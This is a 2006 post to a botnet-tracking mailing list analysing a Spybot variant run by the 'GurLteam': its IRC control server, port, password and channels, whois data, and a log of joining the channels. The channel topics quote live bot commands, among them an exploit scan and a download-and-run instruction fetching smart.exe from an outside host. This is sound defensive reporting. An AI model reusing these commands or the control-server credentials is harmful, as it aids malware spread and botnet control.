To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
Jeremy Linden wrote:
..
>
> I just had a conversation with the guy who runs this botnet. He's from
> Lebanon, part of the GurLteam (a common name if you do lots of botnet
> stuff), and he installs spyware on his machines, as a business. In my
> opinion, this won't be used for DDoS; these guys are professional
> criminals who just want to make their money. I hope they get busted
> though.
>
> Jeremy Linden
Here's another one by the GurLteam:
Botnet (W32/Spybot.AKCH):
[ Network services ]
* Looks for an Internet connection.
* Connects to "users.hot-screen.com" on port 6667 (TCP).
* Connects to IRC server.
* IRC: Uses password nadjoe.
* IRC: Uses nickname Tfeh-80340024.
* IRC: Uses username ezkieyacag.
* IRC: Joins channel ##Tfeh with password li.
* IRC: Sets the usermode for user Tfeh-80340024 to -x+B.
inetnum: 83.98.133.0 - 83.98.133.255
netname: NL-NFORCE-ENTERTAINMENT
descr: NForce Entertainment
country: NL
admin-c: RVE16-RIPE
tech-c: RVE16-RIPE
status: ASSIGNED PA
mnt-by: ROKSCOM-MNT
source: RIPE # Filtered
* Looking up users.hot-screen.com
* Connecting to users.hot-screen.com (83.98.133.125) port 6667...
* Connected. Now logging in...
* GurLStuff, [EMAIL PROTECTED]
* MAP KNOCK SAFELIST HCN MAXCHANNELS=8 MAXBANS=60 NICKLEN=30 TOPICLEN=307
KICKLEN=307 MAXTARGETS=15 AWAYLEN=307 :are supported by this server
* WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+
CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=GurLStuff CASEMAPPING=ascii
EXTBAN=~,cqr :are supported by this server
Now talking on ##Tfeh
* Topic for ##Tfeh is: ;raw join ##lscan,##lmon
* Topic for ##Tfeh set by GurL at Sun Mar 26 20:22:26 2006
--> Now talking on ##lscan
* Topic for ##lscan is: ;advscan dcom135 300 5 0 -r -s
* Topic for ##lscan set by GurL at Sun Mar 26 20:22:26 2006
--> Now talking on ##lmon
* Topic for ##lmon is: ;download http://www.darkblueroom.com/smart.exe
c:\smart.exe 1 -s
* Topic for ##lmon set by GurL at Sun Mar 26 20:22:25 2006
smart.exe extracts the following files to c:\Windows\tok (scanned with
AntiVir):
mc-110-12-0000336.exe (DR/Dldr.NSIS.Agent.P.1)
smart.exe (?)
yaz.exe (TR/LowZones.CR.2)
zan.exe (TR/LowZones.CR.3)
run.bat
I don't know yet what the unpacked smart.exe does.
nick..
_______________________________________________
All list and server information are public and available to law enforcement
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets